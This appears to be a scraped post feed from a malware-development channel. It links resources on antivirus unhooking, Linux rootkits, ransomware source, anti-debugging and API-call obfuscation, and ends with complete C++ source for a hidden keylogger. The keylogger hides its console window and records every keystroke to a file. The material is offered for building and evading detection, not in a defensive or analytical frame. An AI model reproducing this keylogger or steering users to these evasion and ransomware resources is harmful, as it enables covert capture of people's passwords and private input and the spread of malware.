unhooking-by-reading-ntdll-dll-fresh-copy
https://rioasmara.com/2022/02/28/process-unhooking-by-reading-ntdll-dll-fresh-copy/
https://rioasmara.com/2022/02/28/process-unhooking-by-reading-ntdll-dll-fresh-copy/
Cyber Security Architect | Red/Blue Teaming | Exploit/Malware Analysis
Process unhooking by reading ntdll.dll fresh copy
Hi All, I am going to share a simple code to allow you to unhook AV engine from the NTDLL by overwritting dll loaded into the process with the fresh copy of the dll. The expectation of overwritting…
📖#story
Bulgaria in the 1980s became known as the ‘virus factory’, where hundreds of malicious computer programs were unleashed to wreak havoc. But who was writing them, and why?
https://www.theguardian.com/news/2023/may/09/on-the-trail-of-the-dark-avenger-the-most-dangerous-virus-writer-in-the-world
Bulgaria in the 1980s became known as the ‘virus factory’, where hundreds of malicious computer programs were unleashed to wreak havoc. But who was writing them, and why?
https://www.theguardian.com/news/2023/may/09/on-the-trail-of-the-dark-avenger-the-most-dangerous-virus-writer-in-the-world
the Guardian
On the trail of the Dark Avenger: the most dangerous virus writer in the world
The long read: Bulgaria in the 1980s became known as the ‘virus factory’, where hundreds of malicious computer programs were unleashed to wreak havoc. But who was writing them, and why?
What Windows binaries can do:
https://lolbas-project.github.io/
https://lolbas-project.github.io/
<Linux~>
techniques:
https://tmpout.sh/
https://cpl0.zip
crash course on linux rootkits:
https://xcellerator.github.io/categories/linux/
possibly the best resource at ur disposal, kernel source cross referencer
https://elixir.bootlin.com/linux/latest/source/kernel
linux internals:
https://github.com/theja0473/My-Lib-Books-1/blob/master/UnderStanding%20The%20Linux%20Kernel%203rd%20Edition%20V413HAV.pdf
use google translate but these chinese people have some insane techniques:
https://blog.csdn.net
techniques:
https://tmpout.sh/
https://cpl0.zip
crash course on linux rootkits:
https://xcellerator.github.io/categories/linux/
possibly the best resource at ur disposal, kernel source cross referencer
https://elixir.bootlin.com/linux/latest/source/kernel
linux internals:
https://github.com/theja0473/My-Lib-Books-1/blob/master/UnderStanding%20The%20Linux%20Kernel%203rd%20Edition%20V413HAV.pdf
use google translate but these chinese people have some insane techniques:
https://blog.csdn.net
linux
linux :: TheXcellerator
-malware creation to data exfiltration
https://blog.hacktivesecurity.com/index.php/2023/06/05/inside-the-mind-of-a-cyber-attacker-from-malware-creation-to-data-exfiltration-part-1/
https://blog.hacktivesecurity.com/index.php/2023/06/05/inside-the-mind-of-a-cyber-attacker-from-malware-creation-to-data-exfiltration-part-1/
Repo containing different types of malware writing concepts
https://github.com/sufyandaredevil/MALWARE_DEV
https://github.com/sufyandaredevil/MALWARE_DEV
GitHub
GitHub - sufyandaredevil/MALWARE_DEV: Repo contains POCs taken from the course Malware Development 1: The Basics and its succeeding…
Repo contains POCs taken from the course Malware Development 1: The Basics and its succeeding Malware Development 2: Advanced Techniques - sufyandaredevil/MALWARE_DEV
👍1
IHkey is win32 ransomware built using VS 2022 + C++ 17
(Lot of technique)
https://github.com/mr3moe/IHkey
(Lot of technique)
https://github.com/mr3moe/IHkey
GitHub
GitHub - mr3moe/IHkey: IHkey is win32 ransomware built using VS 2022 + C++ 17
IHkey is win32 ransomware built using VS 2022 + C++ 17 - mr3moe/IHkey
👍1
A collection of c++ programs that demonstrate common ways to detect the presence of an attached debugger.
https://github.com/ThomasThelen/Anti-Debugging
https://github.com/ThomasThelen/Anti-Debugging
GitHub
GitHub - ThomasThelen/Anti-Debugging: A collection of c++ programs that demonstrate common ways to detect the presence of an attached…
A collection of c++ programs that demonstrate common ways to detect the presence of an attached debugger. - ThomasThelen/Anti-Debugging
👍1
👍1
`This's pretty forward, let's say I've used VirtualProtect and I want to obfuscate it with Sleep, the tool will manipulate the IAT so that the thunk that points to VirtualProtect will point instead to Sleep, now at executing the file, windows loader will load Sleep instead of VirtualProtect, and moves the execution to the entry point, from there the execution will be redirected to the shellcode, the tool put before, to find the address of VirtualProtect and use it to replace the address of Sleep which assigned before by the loader.
https://github.com/d35ha/CallObfuscator
GitHub
GitHub - d35ha/CallObfuscator: Obfuscate specific windows apis with different apis
Obfuscate specific windows apis with different apis - d35ha/CallObfuscator
🤓1
👍1
Source Byte
Loggy is a keylogger that is created in C++ https://github.com/Black0utDev/Loggy
simple one i wrote
#include <Windows.h>
#include <iostream>
#include <fstream>
#include <stdio.h>
#include <string>
using namespace std;
void WriteToLog(LPCSTR text)
{
ofstream logFile;
logFile.open("Keys.txt", fstream::app);
// logFile << text;
logFile.close();
}
int main()
{
char key;
while (TRUE)
{
ShowWindow(GetConsoleWindow(), 0);
Sleep(10);
for (key = 0x8; key <= 0xBE; key++)
{
if (GetAsyncKeyState(key) == -32767)
{
ofstream logFile;
logFile.open("Keys.txt", fstream::app);
logFile << key;
logFile.close();
}
}
}
return 0;
}
❤🔥2